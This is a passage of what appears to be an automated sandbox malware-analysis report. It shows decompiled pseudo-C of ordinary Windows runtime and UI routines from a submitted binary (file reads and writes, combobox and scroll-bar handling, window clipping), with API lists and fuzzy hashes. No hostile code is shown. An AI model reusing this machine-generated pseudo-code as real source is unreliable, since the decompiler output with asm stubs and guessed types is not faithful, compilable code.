                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: AddressHandleModuleProc
                                            • String ID: COMCTL32.DLL$DllGetVersion
                                            • API String ID: 1646373207-1518460440
                                            • Opcode ID: 2a739991d6eb5f9aa751dae63f041506000971ef8fe04b880086a9e70bc82503
                                            • Instruction ID: 98511304bc6decc3b615f85e9ad6552c3d683fa4d8a624641396a172b3716892
                                            • Opcode Fuzzy Hash: 2a739991d6eb5f9aa751dae63f041506000971ef8fe04b880086a9e70bc82503
                                            • Instruction Fuzzy Hash: 61F04FB1F013396BE71097E9AC45BAA77A89B08754F910532EA10F3290E6B4D90487F9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 79%
                                            			E0041A759(struct HWND__* _a4, intOrPtr _a8) {
                                            				char _v16;
                                            				signed int _t13;
                                            
                                            				if(_a4 == 0 || (GetWindowLongA(_a4, 0xfffffff0) & 0x0000000f) != _a8) {
                                            					return 0;
                                            				} else {
                                            					GetClassNameA(_a4,  &_v16, 0xa);
                                            					_t13 = lstrcmpiA( &_v16, "combobox");
                                            					asm("sbb eax, eax");
                                            					return  ~_t13 + 1;
                                            				}
                                            			}






                                            APIs
                                            • GetWindowLongA.USER32 ref: 0041A76A
                                            • GetClassNameA.USER32(00000000,?,0000000A), ref: 0041A785
                                            • lstrcmpiA.KERNEL32(?,combobox), ref: 0041A794
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: ClassLongNameWindowlstrcmpi
                                            • String ID: combobox
                                            • API String ID: 2054663530-2240613097
                                            • Opcode ID: a59dd8cb4dc7832684d3d012d2b80f62c9ff4b7594d5d7a01661a6692601d5aa
                                            • Instruction ID: 62da548da4bc7eed7f0096d352448fc276db36428101ee4b016d1f9566c4e5fc
                                            • Opcode Fuzzy Hash: a59dd8cb4dc7832684d3d012d2b80f62c9ff4b7594d5d7a01661a6692601d5aa
                                            • Instruction Fuzzy Hash: 66E0E53164020CBFCF219F60CC49F9D37B8E700305F508222B422D50E0D774E2968B99
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0040FD44(signed int _a4, signed int _a8, long _a12) {
                                            				void _v5;
                                            				signed int _v12;
                                            				long _v16;
                                            				signed int _t75;
                                            				void* _t78;
                                            				intOrPtr _t82;
                                            				signed char _t83;
                                            				signed char _t85;
                                            				long _t86;
                                            				void* _t88;
                                            				signed char _t90;
                                            				signed char _t91;
                                            				signed int _t95;
                                            				intOrPtr _t96;
                                            				char _t98;
                                            				signed int _t99;
                                            				long _t101;
                                            				long _t102;
                                            				signed int _t103;
                                            				intOrPtr _t106;
                                            				signed int _t108;
                                            				signed int _t109;
                                            				signed int _t111;
                                            				signed char _t112;
                                            				signed char* _t113;
                                            				long _t115;
                                            				void* _t119;
                                            				signed int _t120;
                                            				intOrPtr* _t121;
                                            				signed int _t123;
                                            				signed char* _t124;
                                            				void* _t125;
                                            				void* _t126;
                                            
                                            				_v12 = _v12 & 0x00000000;
                                            				_t108 = _a8;
                                            				_t119 = _t108;
                                            				if(_a12 == 0) {
                                            					L42:
                                            					__eflags = 0;
                                            					return 0;
                                            				}
                                            				_t75 = _a4;
                                            				_t111 = _t75 >> 5;
                                            				_t121 = 0x43b520 + _t111 * 4;
                                            				_t123 = (_t75 & 0x0000001f) + (_t75 & 0x0000001f) * 8 << 2;
                                            				_t78 =  *((intOrPtr*)(0x43b520 + _t111 * 4)) + _t123;
                                            				_t112 =  *((intOrPtr*)(_t78 + 4));
                                            				if((_t112 & 0x00000002) != 0) {
                                            					goto L42;
                                            				}
                                            				if((_t112 & 0x00000048) != 0) {
                                            					_t106 =  *((intOrPtr*)(_t78 + 5));
                                            					if(_t106 != 0xa) {
                                            						_a12 = _a12 - 1;
                                            						 *_t108 = _t106;
                                            						_t119 = _t108 + 1;
                                            						_v12 = 1;
                                            						 *((char*)( *_t121 + _t123 + 5)) = 0xa;
                                            					}
                                            				}
                                            				if(ReadFile( *( *_t121 + _t123), _t119, _a12,  &_v16, 0) != 0) {
                                            					_t82 =  *_t121;
                                            					_t120 = _v16;
                                            					_v12 = _v12 + _t120;
                                            					_t31 = _t123 + 4; // 0x4
                                            					_t113 = _t82 + _t31;
                                            					_t83 =  *((intOrPtr*)(_t82 + _t123 + 4));
                                            					__eflags = _t83 & 0x00000080;
                                            					if((_t83 & 0x00000080) == 0) {
                                            						L41:
                                            						return _v12;
                                            					}
                                            					__eflags = _t120;
                                            					if(_t120 == 0) {
                                            						L15:
                                            						_t85 = _t83 & 0x000000fb;
                                            						__eflags = _t85;
                                            						L16:
                                            						 *_t113 = _t85;
                                            						_t86 = _a8;
                                            						_a12 = _t86;
                                            						_t115 = _v12 + _t86;
                                            						__eflags = _t86 - _t115;
                                            						_v12 = _t115;
                                            						if(_t86 >= _t115) {
                                            							L40:
                                            							_t109 = _t108 - _a8;
                                            							__eflags = _t109;
                                            							_v12 = _t109;
                                            							goto L41;
                                            						} else {
                                            							goto L17;
                                            						}
                                            						while(1) {
                                            							L17:
                                            							_t88 =  *_a12;
                                            							__eflags = _t88 - 0x1a;
                                            							if(_t88 == 0x1a) {
                                            								break;
                                            							}
                                            							__eflags = _t88 - 0xd;
                                            							if(_t88 == 0xd) {
                                            								__eflags = _a12 - _t115 - 1;
                                            								if(_a12 >= _t115 - 1) {
                                            									_a12 = _a12 + 1;
                                            									_t95 = ReadFile( *( *_t121 + _t123),  &_v5, 1,  &_v16, 0);
                                            									__eflags = _t95;
                                            									if(_t95 != 0) {
                                            										L26:
                                            										__eflags = _v16;
                                            										if(_v16 == 0) {
                                            											L34:
                                            											 *_t108 = 0xd;
                                            											L35:
                                            											_t108 = _t108 + 1;
                                            											__eflags = _t108;
                                            											L36:
                                            											_t115 = _v12;
                                            											__eflags = _a12 - _t115;
                                            											if(_a12 < _t115) {
                                            												continue;
                                            											}
                                            											goto L40;
                                            										}
                                            										_t96 =  *_t121;
                                            										__eflags =  *(_t96 + _t123 + 4) & 0x00000048;
                                            										if(( *(_t96 + _t123 + 4) & 0x00000048) == 0) {
                                            											__eflags = _t108 - _a8;
                                            											if(__eflags != 0) {
                                            												L33:
                                            												E0040AE93(__eflags, _a4, 0xffffffff, 1);
                                            												_t126 = _t126 + 0xc;
                                            												__eflags = _v5 - 0xa;
                                            												if(_v5 == 0xa) {
                                            													goto L36;
                                            												}
                                            												goto L34;
                                            											}
                                            											__eflags = _v5 - 0xa;
                                            											if(__eflags != 0) {
                                            												goto L33;
                                            											}
                                            											L32:
                                            											 *_t108 = 0xa;
                                            											goto L35;
                                            										}
                                            										_t98 = _v5;
                                            										__eflags = _t98 - 0xa;
                                            										if(_t98 == 0xa) {
                                            											goto L32;
                                            										}
                                            										 *_t108 = 0xd;
                                            										_t108 = _t108 + 1;
                                            										 *((char*)( *_t121 + _t123 + 5)) = _t98;
                                            										goto L36;
                                            									}
                                            									_t99 = GetLastError();
                                            									__eflags = _t99;
                                            									if(_t99 != 0) {
                                            										goto L34;
                                            									}
                                            									goto L26;
                                            								}
                                            								_t101 = _a12 + 1;
                                            								__eflags =  *_t101 - 0xa;
                                            								if( *_t101 != 0xa) {
                                            									 *_t108 = 0xd;
                                            									_t108 = _t108 + 1;
                                            									_a12 = _t101;
                                            									goto L36;
                                            								}
                                            								_a12 = _a12 + 2;
                                            								goto L32;
                                            							}
                                            							 *_t108 = _t88;
                                            							_t108 = _t108 + 1;
                                            							_a12 = _a12 + 1;
                                            							goto L36;
                                            						}
                                            						_t124 =  *_t121 + _t123 + 4;
                                            						_t90 =  *_t124;
                                            						__eflags = _t90 & 0x00000040;
                                            						if((_t90 & 0x00000040) == 0) {
                                            							_t91 = _t90 | 0x00000002;
                                            							__eflags = _t91;
                                            							 *_t124 = _t91;
                                            						}
                                            						goto L40;
                                            					}
                                            					__eflags =  *_t108 - 0xa;
                                            					if( *_t108 != 0xa) {
                                            						goto L15;
                                            					}
                                            					_t85 = _t83 | 0x00000004;
                                            					goto L16;
                                            				}
                                            				_t102 = GetLastError();
                                            				_t125 = 5;
                                            				if(_t102 != _t125) {
                                            					__eflags = _t102 - 0x6d;
                                            					if(_t102 == 0x6d) {
                                            						goto L42;
                                            					}
                                            					_t103 = E00406F05(_t102);
                                            					L10:
                                            					return _t103 | 0xffffffff;
                                            				}
                                            				 *((intOrPtr*)(E00406F78())) = 9;
                                            				_t103 = E00406F81();
                                            				 *_t103 = _t125;
                                            				goto L10;
                                            			}





































                                            APIs
                                            • ReadFile.KERNEL32(?,?,00000000,?,00000000,?,?), ref: 0040FDBE
                                            • GetLastError.KERNEL32(?,?), ref: 0040FDC8
                                            • ReadFile.KERNEL32(?,?,00000001,?,00000000,?,?), ref: 0040FE8E
                                            • GetLastError.KERNEL32(?,?), ref: 0040FE98
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastRead
                                            • String ID:
                                            • API String ID: 1948546556-0
                                            • Opcode ID: 23115844c508a177bbe59758e9f8f5cb7ac59ad074daaa557504e197aa77565a
                                            • Instruction ID: d01b3c0b8dd5da0b8901ede80a7d7d1cd1fd8d123d1325fb95f4599fb7a38ff2
                                            • Opcode Fuzzy Hash: 23115844c508a177bbe59758e9f8f5cb7ac59ad074daaa557504e197aa77565a
                                            • Instruction Fuzzy Hash: 7051C7306043859FDF31CF58C88479A7BB0EF12304F5445BBE851AB6E2D378994ACB99
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 92%
                                            			E0041FCEC(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
                                            				intOrPtr _v8;
                                            				intOrPtr _v12;
                                            				struct tagRECT _v28;
                                            				struct tagRECT _v44;
                                            				struct tagRECT _v60;
                                            				void* _t79;
                                            				int _t81;
                                            				intOrPtr* _t83;
                                            				intOrPtr _t87;
                                            				intOrPtr _t106;
                                            				int _t120;
                                            				void* _t128;
                                            				void* _t132;
                                            				intOrPtr _t138;
                                            				void* _t140;
                                            				void* _t143;
                                            
                                            				_t140 = __edi;
                                            				_t128 = __ecx;
                                            				_t79 = _a4 -  *((intOrPtr*)(__ecx + 4));
                                            				_t132 = _a8 -  *((intOrPtr*)(__ecx + 8));
                                            				_t138 =  *((intOrPtr*)(__ecx + 0x8c));
                                            				_t143 = 2;
                                            				if(_t138 == 0xa) {
                                            					L7:
                                            					 *((intOrPtr*)(_t128 + 0x28)) =  *((intOrPtr*)(_t128 + 0x28)) + _t79;
                                            					L9:
                                            					_t81 =  *((intOrPtr*)(_t128 + 0x30)) -  *((intOrPtr*)(_t128 + 0x28));
                                            					__eflags = _t81;
                                            					L10:
                                            					if(_t81 < 0) {
                                            						_t81 = 0;
                                            					}
                                            					_t83 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t128 + 0x68)))) + 0xbc))( &(_v28.right), _t81, _t143, _t140);
                                            					_v12 =  *_t83;
                                            					_v8 =  *((intOrPtr*)(_t83 + 4));
                                            					GetWindowRect(GetDesktopWindow(),  &_v60);
                                            					asm("movsd");
                                            					asm("movsd");
                                            					_t87 =  *((intOrPtr*)(_t128 + 0x8c));
                                            					asm("movsd");
                                            					asm("movsd");
                                            					if(_t87 == 0xa || _t87 == 0xc) {
                                            						_v44.left =  *((intOrPtr*)(_t128 + 0x58)) -  *((intOrPtr*)(_t128 + 0x60)) - _v12 + _v44.right;
                                            						_v44.top =  *((intOrPtr*)(_t128 + 0x5c)) -  *((intOrPtr*)(_t128 + 0x64)) - _v8 + _v44.bottom;
                                            						__eflags = IntersectRect( &_v28,  &_v60,  &_v44);
                                            						if(__eflags != 0) {
                                            							 *((intOrPtr*)(_t128 + 0x38)) =  *((intOrPtr*)(_t128 + 0x40)) - _v12;
                                            							_t106 =  *((intOrPtr*)(_t128 + 0x44)) - _v8;
                                            							__eflags = _t106;
                                            							 *((intOrPtr*)(_t128 + 0x3c)) = _t106;
                                            							 *(_t128 + 0x48) = _v44.left;
                                            							 *((intOrPtr*)(_t128 + 0x4c)) = _v44.top;
                                            						}
                                            					} else {
                                            						_v44.right =  *((intOrPtr*)(_t128 + 0x60)) -  *((intOrPtr*)(_t128 + 0x58)) + _v44.left + _v12;
                                            						_v44.bottom =  *((intOrPtr*)(_t128 + 0x64)) -  *((intOrPtr*)(_t128 + 0x5c)) + _v44.top + _v8;
                                            						_t120 = IntersectRect( &_v28,  &_v60,  &_v44);
                                            						_t152 = _t120;
                                            						if(_t120 != 0) {
                                            							 *((intOrPtr*)(_t128 + 0x40)) =  *((intOrPtr*)(_t128 + 0x38)) + _v12;
                                            							 *((intOrPtr*)(_t128 + 0x44)) =  *((intOrPtr*)(_t128 + 0x3c)) + _v8;
                                            							 *((intOrPtr*)(_t128 + 0x50)) = _v44.right;
                                            							 *((intOrPtr*)(_t128 + 0x54)) = _v44.bottom;
                                            						}
                                            					}
                                            					 *((intOrPtr*)(_t128 + 4)) = _a4;
                                            					 *((intOrPtr*)(_t128 + 8)) = _a8;
                                            					return E0042007A(_t128, _t152, 0);
                                            				}
                                            				if(_t138 == 0xb) {
                                            					__eflags = _t138 - 0xa;
                                            					if(_t138 != 0xa) {
                                            						_t14 = __ecx + 0x30;
                                            						 *_t14 =  *((intOrPtr*)(__ecx + 0x30)) + _t79;
                                            						__eflags =  *_t14;
                                            						goto L9;
                                            					}
                                            					goto L7;
                                            				} else {
                                            					_t143 = 0x22;
                                            					if(_t138 != 0xc) {
                                            						_t8 = __ecx + 0x34;
                                            						 *_t8 =  *((intOrPtr*)(__ecx + 0x34)) + _t132;
                                            						__eflags =  *_t8;
                                            					} else {
                                            						 *((intOrPtr*)(__ecx + 0x2c)) =  *((intOrPtr*)(__ecx + 0x2c)) + _t132;
                                            					}
                                            					_t81 =  *((intOrPtr*)(_t128 + 0x34)) -  *((intOrPtr*)(_t128 + 0x2c));
                                            					goto L10;
                                            				}
                                            			}

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Rect$IntersectWindow$Desktop
                                            • String ID:
                                            • API String ID: 123605412-0
                                            • Opcode ID: 015e43c128581ee0b130330a2085ed8f419fa95b38046ca9c52191cf96206b73
                                            • Instruction ID: 7ef3134b71351d20188b2f6e6573302e8d5814b45845c27d755b710e50fb3d9e
                                            • Opcode Fuzzy Hash: 015e43c128581ee0b130330a2085ed8f419fa95b38046ca9c52191cf96206b73
                                            • Instruction Fuzzy Hash: 43517272A00209DFCF54DFA8D5C4ADEBBF5BF08314B1441A6E905EB20AE734E986CB54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0040AF6B(long _a4, void* _a8, long _a12) {
                                            				intOrPtr* _v8;
                                            				long _v12;
                                            				long _v16;
                                            				signed int _v20;
                                            				void _v1048;
                                            				void** _t66;
                                            				signed int _t67;
                                            				intOrPtr _t69;
                                            				signed int _t70;
                                            				intOrPtr _t71;
                                            				signed int _t73;
                                            				signed int _t80;
                                            				int _t85;
                                            				long _t87;
                                            				intOrPtr* _t91;
                                            				intOrPtr _t97;
                                            				struct _OVERLAPPED* _t101;
                                            				long _t103;
                                            				signed int _t105;
                                            				struct _OVERLAPPED* _t106;
                                            
                                            				_t101 = 0;
                                            				_v12 = 0;
                                            				_v20 = 0;
                                            				if(_a12 != 0) {
                                            					_t91 = 0x43b520 + (_a4 >> 5) * 4;
                                            					_t105 = (_a4 & 0x0000001f) + (_a4 & 0x0000001f) * 8 << 2;
                                            					__eflags =  *( *_t91 + _t105 + 4) & 0x00000020;
                                            					if(__eflags != 0) {
                                            						E0040AE93(__eflags, _a4, 0, 2);
                                            					}
                                            					_t66 =  *_t91 + _t105;
                                            					__eflags = _t66[1] & 0x00000080;
                                            					if((_t66[1] & 0x00000080) == 0) {
                                            						_t67 = WriteFile( *_t66, _a8, _a12,  &_v16, _t101);
                                            						__eflags = _t67;
                                            						if(_t67 == 0) {
                                            							_a4 = GetLastError();
                                            						} else {
                                            							_a4 = _t101;
                                            							_v12 = _v16;
                                            						}
                                            						L15:
                                            						_t69 = _v12;
                                            						__eflags = _t69 - _t101;
                                            						if(_t69 != _t101) {
                                            							_t70 = _t69 - _v20;
                                            							__eflags = _t70;
                                            							return _t70;
                                            						}
                                            						__eflags = _a4 - _t101;
                                            						if(_a4 == _t101) {
                                            							L25:
                                            							_t71 =  *_t91;
                                            							__eflags =  *(_t71 + _t105 + 4) & 0x00000040;
                                            							if(( *(_t71 + _t105 + 4) & 0x00000040) == 0) {
                                            								L27:
                                            								 *((intOrPtr*)(E00406F78())) = 0x1c;
                                            								_t73 = E00406F81();
                                            								 *_t73 = _t101;
                                            								L24:
                                            								return _t73 | 0xffffffff;
                                            							}
                                            							__eflags =  *_a8 - 0x1a;
                                            							if( *_a8 == 0x1a) {
                                            								goto L1;
                                            							}
                                            							goto L27;
                                            						}
                                            						_t106 = 5;
                                            						__eflags = _a4 - _t106;
                                            						if(_a4 != _t106) {
                                            							_t73 = E00406F05(_a4);
                                            						} else {
                                            							 *((intOrPtr*)(E00406F78())) = 9;
                                            							_t73 = E00406F81();
                                            							 *_t73 = _t106;
                                            						}
                                            						goto L24;
                                            					}
                                            					__eflags = _a12 - _t101;
                                            					_v8 = _a8;
                                            					_a4 = _t101;
                                            					if(_a12 <= _t101) {
                                            						goto L25;
                                            					} else {
                                            						goto L6;
                                            					}
                                            					do {
                                            						L6:
                                            						_t80 =  &_v1048;
                                            						do {
                                            							__eflags = _v8 - _a8 - _a12;
                                            							if(_v8 - _a8 >= _a12) {
                                            								break;
                                            							}
                                            							_v8 = _v8 + 1;
                                            							_t97 =  *_v8;
                                            							__eflags = _t97 - 0xa;
                                            							if(_t97 == 0xa) {
                                            								_v20 = _v20 + 1;
                                            								 *_t80 = 0xd;
                                            								_t80 = _t80 + 1;
                                            								__eflags = _t80;
                                            							}
                                            							 *_t80 = _t97;
                                            							_t80 = _t80 + 1;
                                            							__eflags = _t80 -  &_v1048 - 0x400;
                                            						} while (_t80 -  &_v1048 < 0x400);
                                            						_t103 = _t80 -  &_v1048;
                                            						_t85 = WriteFile( *( *_t91 + _t105),  &_v1048, _t103,  &_v16, 0);
                                            						__eflags = _t85;
                                            						if(_t85 == 0) {
                                            							_a4 = GetLastError();
                                            							break;
                                            						}
                                            						_t87 = _v16;
                                            						_v12 = _v12 + _t87;
                                            						__eflags = _t87 - _t103;
                                            						if(_t87 < _t103) {
                                            							break;
                                            						}
                                            						__eflags = _v8 - _a8 - _a12;
                                            					} while (_v8 - _a8 < _a12);
                                            					_t101 = 0;
                                            					__eflags = 0;
                                            					goto L15;
                                            				}
                                            				L1:
                                            				return 0;
                                            			}

                                            APIs
                                            • WriteFile.KERNEL32(?,?,?,?,00000000,00000001,?,?), ref: 0040B032
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: FileWrite
                                            • String ID:
                                            • API String ID: 3934441357-0
                                            • Opcode ID: fd880a33552e59a877ac07e62e70fb8bcc1509261c86d9df016157276de9b604
                                            • Instruction ID: 01ac4f6acfc5913959f88f192ecd96d6d2ffcc37b6012a8bce105fbf1c838ef3
                                            • Opcode Fuzzy Hash: fd880a33552e59a877ac07e62e70fb8bcc1509261c86d9df016157276de9b604
                                            • Instruction Fuzzy Hash: 21519371A00209EFCB11DF68C844B9E7BB4EF41344F1581BAE825AB291D734DA51CB9D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 84%
                                            			E00427B02(void* __ecx, int _a4, int _a8, int _a12) {
                                            				intOrPtr _v16;
                                            				signed int _v20;
                                            				signed int _v24;
                                            				intOrPtr _v28;
                                            				char _v32;
                                            				intOrPtr _t60;
                                            				intOrPtr _t61;
                                            				intOrPtr _t66;
                                            				int _t68;
                                            				void* _t69;
                                            				intOrPtr _t75;
                                            				intOrPtr* _t78;
                                            				signed short _t94;
                                            				intOrPtr* _t107;
                                            				signed int _t110;
                                            				int* _t111;
                                            				intOrPtr _t113;
                                            				void* _t114;
                                            
                                            				_t114 = __ecx;
                                            				if( *((intOrPtr*)(__ecx + 0xec)) != 0) {
                                            					_t89 = _a4;
                                            					_t60 =  *((intOrPtr*)(__ecx + 0x90));
                                            					 *(__ecx + 0xf8) = 1;
                                            					_t110 = _a4 + _a4 * 4 << 3;
                                            					 *((intOrPtr*)(_t60 + 0x20)) =  *((intOrPtr*)(_t60 + _t110 + 0x20));
                                            					 *((intOrPtr*)(_t60 + 0x24)) =  *((intOrPtr*)(_t60 + _t110 + 0x24));
                                            					_t61 =  *((intOrPtr*)(__ecx + 0x90));
                                            					 *((intOrPtr*)(_t61 + 0x10)) =  *((intOrPtr*)(_t61 + _t110 + 0x10));
                                            					 *((intOrPtr*)(_t61 + 0x14)) =  *((intOrPtr*)(_t61 + _t110 + 0x14));
                                            					E00427C71(__ecx,  *((intOrPtr*)(__ecx + 0xf4)) + _t89, 0);
                                            					E0042722C(__ecx,  *((intOrPtr*)(_t61 + _t110 + 0x14)), __eflags, 0);
                                            					_t66 =  *((intOrPtr*)(_t114 + 0x90));
                                            					_t111 = _t110 + _t66 + 0x18;
                                            					_a8 = MulDiv(_a8,  *_t111,  *(_t110 + _t66 + 0x1c));
                                            					_t68 = MulDiv(_a12,  *_t111, _t111[1]);
                                            					_t107 =  *((intOrPtr*)(_t114 + 0x90));
                                            					_a8 = _a8 +  *_t107;
                                            					_t69 = _t68 +  *((intOrPtr*)(_t107 + 4));
                                            					__eflags = _t69;
                                            					_push(_t69);
                                            					_push(_a8);
                                            					return E0041B0C1(_t114,  *((intOrPtr*)(_t107 + 4)));
                                            				}
                                            				 *(__ecx + 0xf8) =  *(__ecx + 0xe8);
                                            				ShowScrollBar( *(__ecx + 0x1c), 0, 0);
                                            				_t75 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t114 + 0x114)))) + 0x5c));
                                            				_t94 =  *((intOrPtr*)(_t75 + 0x1e));
                                            				if(_t94 >= 0x8000) {
                                            					L3:
                                            					_a4 = 0;
                                            					L4:
                                            					ShowScrollBar( *(_t114 + 0x1c), 1, _a4);
                                            					if(_a4 != 0) {
                                            						_t78 =  *((intOrPtr*)(_t114 + 0x114));
                                            						_v28 = 3;
                                            						_t113 = 1;
                                            						_v24 =  *( *((intOrPtr*)( *_t78 + 0x5c)) + 0x1c) & 0x0000ffff;
                                            						_v20 =  *( *((intOrPtr*)( *_t78 + 0x5c)) + 0x1e) & 0x0000ffff;
                                            						_v16 = _t113;
                                            						if(E00415006(_t114, _t113,  &_v32, 0) == 0) {
                                            							E00414F60(_t114, _t113, _v24, _v20, 0);
                                            						}
                                            					}
                                            					return E00427C71(_t114,  *((intOrPtr*)(_t114 + 0xf4)), 1);
                                            				}
                                            				_a4 = 1;
                                            				if((_t94 & 0x0000ffff) - ( *(_t75 + 0x1c) & 0x0000ffff) <= 0x7fff) {
                                            					goto L4;
                                            				}
                                            				goto L3;
                                            			}






















                                            APIs
                                            • ShowScrollBar.USER32(?,00000000,00000000), ref: 00427B32
                                            • ShowScrollBar.USER32(?,00000001,?), ref: 00427B6D
                                            • MulDiv.KERNEL32(?,?,?), ref: 00427C40
                                            • MulDiv.KERNEL32(?,?,?), ref: 00427C4D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: ScrollShow
                                            • String ID:
                                            • API String ID: 3611344627-0
                                            • Opcode ID: 2acf91cb5d467283592410175f9d93aeb9e8677cf2499e65e3e46aab8ffa07e5
                                            • Instruction ID: e36dfcb719c56f5c0c47cfadceb7236ddc00b612851f65575ceccfe99fb50706
                                            • Opcode Fuzzy Hash: 2acf91cb5d467283592410175f9d93aeb9e8677cf2499e65e3e46aab8ffa07e5
                                            • Instruction Fuzzy Hash: A1417C70600615AFCB14DF29D880EAABBF5FF88308F10856EF9199B361D774E851DB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 72%
                                            			E0042007A(void* __ecx, void* __eflags, intOrPtr _a4) {
                                            				intOrPtr _v8;
                                            				intOrPtr _v12;
                                            				intOrPtr _v16;
                                            				intOrPtr _v20;
                                            				intOrPtr _v24;
                                            				struct tagRECT _v40;
                                            				void* __ebp;
                                            				intOrPtr _t56;
                                            				signed char _t60;
                                            				signed char _t65;
                                            				intOrPtr _t67;
                                            				signed int _t73;
                                            				void* _t76;
                                            				intOrPtr _t84;
                                            				intOrPtr _t95;
                                            
                                            				_t56 = 1;
                                            				_t76 = __ecx;
                                            				_v24 = _t56;
                                            				_v20 = _t56;
                                            				_push(GetStockObject(0));
                                            				_t84 = E0041A5FC();
                                            				_v16 = _t84;
                                            				_v8 = E00423BE7(__eflags);
                                            				_t60 =  *(_t76 + 0x74);
                                            				_v12 = _t84;
                                            				if((0x0000a000 & _t60) == 0) {
                                            					__eflags = _t60 & 0x00000050;
                                            					if(__eflags == 0) {
                                            						_v24 = GetSystemMetrics(0x20) - 1;
                                            						_v20 = GetSystemMetrics(0x21) - 1;
                                            						_t65 =  *(_t76 + 0x78);
                                            						__eflags = 0x0000a000 & _t65;
                                            						if((0x0000a000 & _t65) == 0) {
                                            							L7:
                                            							__eflags = _t65 & 0x00000050;
                                            							if(__eflags == 0) {
                                            								L10:
                                            							} else {
                                            								__eflags =  *(_t76 + 0x7c);
                                            								if(__eflags == 0) {
                                            									goto L10;
                                            								} else {
                                            									goto L9;
                                            								}
                                            							}
                                            						} else {
                                            							__eflags =  *(_t76 + 0x7c);
                                            							if(__eflags != 0) {
                                            								goto L7;
                                            							}
                                            						}
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						_v12 = _v8;
                                            					} else {
                                            						goto L2;
                                            					}
                                            				} else {
                                            					L2:
                                            					asm("movsd");
                                            					asm("movsd");
                                            					asm("movsd");
                                            					asm("movsd");
                                            				}
                                            				if(_a4 != 0) {
                                            					_v20 = 0;
                                            					_v24 = 0;
                                            				}
                                            				_t95 =  *0x439c3c; // 0x1
                                            				if(_t95 != 0 && ( *(_t76 + 0x75) & 0x000000f0) != 0) {
                                            					InflateRect( &_v40, 0xffffffff, 0xffffffff);
                                            				}
                                            				_t97 =  *(_t76 + 0x24);
                                            				_t67 = _v8;
                                            				if( *(_t76 + 0x24) == 0) {
